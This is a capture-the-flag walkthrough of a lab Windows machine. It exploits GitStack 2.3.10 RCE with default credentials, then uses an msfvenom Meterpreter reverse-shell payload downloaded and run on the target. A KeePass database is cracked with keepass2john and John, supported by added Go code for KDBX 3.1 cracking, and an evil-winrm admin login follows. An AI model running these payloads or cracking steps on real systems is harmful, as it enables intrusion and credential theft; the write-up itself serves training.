Premise
In this walk-through we go over the Windows box named Stack, exploit a GitStack application deployed on its web server, and escalate privileges by cracking the master password of a KeePass database found on the host.
Skills Learned
- GitStack Exploitation
- Windows Privilege Escalation
- Cracking KeePass Database (.kdbx) Master Passwords with keepass2john and John the Ripper
Finding the Way In
My first step was to scan the target with nmap to see which services were running. It exposed an HTTP server and SMB. Requesting the web root returned a "page not found" error, but the application's debug output listed the URL patterns it serves, and three of them stood out: "registration", "login" and "gitstack". A 404 page that lists routes is itself a finding: it is what a web framework returns when debug mode has been left on in production, and it hands an attacker the site map for free.
I started with the "login" directory, which accepted the default credentials admin/admin. This was a great start. The "gitstack" directory identified the install as GitStack version 2.3.10, and a quick searchsploit query for that version turned up a public remote code execution (RCE) exploit (CVE-2018-5955). This was my ticket in.
Getting a Foothold
I downloaded the public Python exploit, set my IP address and the admin/admin credentials I had found in it, and used it to run a few commands on the target. `whoami` came back as "john", an ordinary user account, so privilege escalation was still ahead of me.
To get a more stable and capable shell, I generated a Meterpreter payload with msfvenom, hosted it with Python's built-in web server on my machine, and started a multi/handler listener in Metasploit configured with the same LHOST and LPORT the payload was built with (if the two do not match, the payload runs but never calls back). I then changed the command in the exploit script one more time so that the target would download and execute the payload. As soon as it did, I had a Meterpreter session, a shell that also gives you file transfer, process control and a range of post-exploitation modules on the target.
Becoming the Admin
Now that I had a shell, my next goal was to become the administrator of the machine. I noticed a KeePass database file (.kdbx) in john's Documents folder. KeePass is a password manager, so this file almost certainly held credentials worth having.
I downloaded the KeePass database to my machine and ran keepass2john over it. A .kdbx file stores no hash of the master password; what keepass2john extracts is the material from the file header (salts, IV, round count and the expected first plaintext bytes) in a format John the Ripper can attack by deriving a key from each candidate password and checking whether it decrypts that first block. Because the check is entirely offline, there is no lockout to worry about, only the per-guess cost of the key transformation rounds. I ran John against it with the rockyou wordlist and it did not take long to find the master password: "princess".
I installed KeePass on my machine and opened the database with the password I had just cracked. Inside were the credentials for the administrator account; the password was "secure3apass262".
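The extraction and cracking steps above, as an added worked example that is not code from the original walkthrough: it writes a minimal KDBX 3.1 header (the KeePass 2.x format before KDBX 4) around a constructed master password, parses the fields keepass2john reads, re-derives the master key the way John does for each candidate, and checks the first decrypted block against the header's expected start bytes. Every seed, the IV, the start bytes and the round count are constructed demo values, and the round count is deliberately tiny so the example finishes instantly.

```go
package main
// Added example, not code from the original write-up. It shows what keepass2john
// reads from a KDBX 3.1 header and what John recomputes per candidate password.
// Every seed, the IV, the start bytes and the round count are constructed values.

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
)

// Header field IDs of the KDBX 3.x format (KeePass 2.x before KDBX 4).
const (
	fieldEnd, fieldMasterSeed, fieldTransformSeed = 0, 4, 5
	fieldRounds, fieldIV, fieldStreamStart        = 6, 7, 9
)

type kdbxHeader map[byte][]byte // field ID -> raw value, as the header stores it

// parseHeader reads sig1, sig2, version, then id/size(uint16)/data records up to
// id 0; it returns the fields and the offset where the encrypted payload starts.
func parseHeader(data []byte) (kdbxHeader, int, error) {
	if len(data) < 12 || string(data[:4]) != "\x03\xd9\xa2\x9a" { // sig1 0x9AA2D903 LE
		return nil, 0, fmt.Errorf("not a KDBX file")
	}
	h := kdbxHeader{}
	for pos := 12; ; {
		if pos+3 > len(data) || pos+3+int(binary.LittleEndian.Uint16(data[pos+1:])) > len(data) {
			return nil, 0, fmt.Errorf("truncated header at offset %d", pos)
		}
		id, size := data[pos], int(binary.LittleEndian.Uint16(data[pos+1:]))
		h[id] = data[pos+3 : pos+3+size]
		pos += 3 + size
		if id == fieldEnd {
			return h, pos, nil
		}
	}
}

// masterKey is the KDBX 3.1 KDF: SHA256(SHA256(pw)), N rounds of AES-256-ECB under
// TransformSeed on both 16-byte halves, SHA256, then SHA256(MasterSeed || that).
func masterKey(h kdbxHeader, password string) []byte {
	pw := sha256.Sum256([]byte(password))
	t := sha256.Sum256(pw[:])
	block, _ := aes.NewCipher(h[fieldTransformSeed])
	for i, n := uint64(0), binary.LittleEndian.Uint64(h[fieldRounds]); i < n; i++ {
		block.Encrypt(t[:16], t[:16])
		block.Encrypt(t[16:], t[16:])
	}
	tr := sha256.Sum256(t[:])
	mk := sha256.Sum256(append(append([]byte{}, h[fieldMasterSeed]...), tr[:]...))
	return mk[:]
}

// checkPassword is John's per-candidate test: decrypt the first 32 payload bytes
// with the derived key and compare them with the header's StreamStart bytes.
func checkPassword(h kdbxHeader, encStart []byte, password string) bool {
	block, _ := aes.NewCipher(masterKey(h, password)) // always a 32-byte key
	out := make([]byte, 32)
	cipher.NewCBCDecrypter(block, h[fieldIV]).CryptBlocks(out, encStart[:32])
	return bytes.Equal(out, h[fieldStreamStart])
}

// crack is the wordlist attack in miniature: the first candidate that checks wins.
func crack(h kdbxHeader, encStart []byte, words []string) (string, bool) {
	for _, w := range words {
		if checkPassword(h, encStart, w) {
			return w, true
		}
	}
	return "", false
}

// sampleKDBX is a constructed stand-in for a real .kdbx: a minimal 3.1 header plus
// the first payload block, encrypted the way KeePass would under this password.
func sampleKDBX(password string) []byte {
	rounds := make([]byte, 8)
	binary.LittleEndian.PutUint64(rounds, 6000) // real databases use far more
	h := kdbxHeader{fieldMasterSeed: bytes.Repeat([]byte{0x11}, 32), fieldTransformSeed: bytes.Repeat([]byte{0x22}, 32),
		fieldRounds: rounds, fieldIV: bytes.Repeat([]byte{0x33}, 16), fieldStreamStart: bytes.Repeat([]byte{0x44}, 32)}
	var buf bytes.Buffer
	binary.Write(&buf, binary.LittleEndian, []uint32{0x9AA2D903, 0xB54BFB67, 0x00030001})
	for _, id := range []byte{fieldMasterSeed, fieldTransformSeed, fieldRounds, fieldIV, fieldStreamStart, fieldEnd} {
		buf.WriteByte(id)
		binary.Write(&buf, binary.LittleEndian, uint16(len(h[id])))
		buf.Write(h[id])
	}
	block, _ := aes.NewCipher(masterKey(h, password))
	enc := make([]byte, 32)
	cipher.NewCBCEncrypter(block, h[fieldIV]).CryptBlocks(enc, h[fieldStreamStart])
	return append(buf.Bytes(), enc...)
}

func main() {
	file := sampleKDBX("princess")
	h, off, _ := parseHeader(file)
	pw, ok := crack(h, file[off:off+32], []string{"123456", "password", "princess"})
	fmt.Println("cracked:", ok, pw) // cracked: true princess
}
```

Two things to take from it: the only secret-dependent work per guess is the transform loop, so the round count (set by whoever created the database) is the sole brake on a wordlist attack, and nothing in the file rate-limits or locks out an offline attacker. The example covers KDBX 3.1 only; KDBX 4 files use a different header layout and Argon2-based key derivation, which is why keepass2john output and cracking speed differ for newer databases.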
With the administrator's password in hand, I used evil-winrm to log in over WinRM as the administrator. I was now in full control of the "Stack" machine! 🚀
Commands I Used
Here are some of the key commands I used during this process:
- Scanning for services:
nmap <IP>
- Searching for exploits:
searchsploit gitstack
- Generating a malicious payload:
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.7 LPORT=4545 -f exe -o shell.exe
- Starting a simple web server:
python -m http.server
- Starting the Metasploit console:
msfconsole
- Using the multi-handler exploit and setting the payload to match the one built with msfvenom:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
- Pointing the listener at the same address and port the payload was built with, then starting it:
set LHOST 10.10.0.7
set LPORT 4545
run
- Downloading a file from the target machine (from inside the Meterpreter session):
download "Password Manager.kdbx"
- Extracting the hash from a KeePass database:
keepass2john "Password Manager.kdbx" > hash
- Cracking the hash with John the Ripper:
john --wordlist=/usr/share/wordlists/rockyou.txt hash
- Logging in as the administrator:
evil-winrm -i <IP> -u administrator -p 'secure3apass262'
- Checking the current user:
whoami
Video Walk-through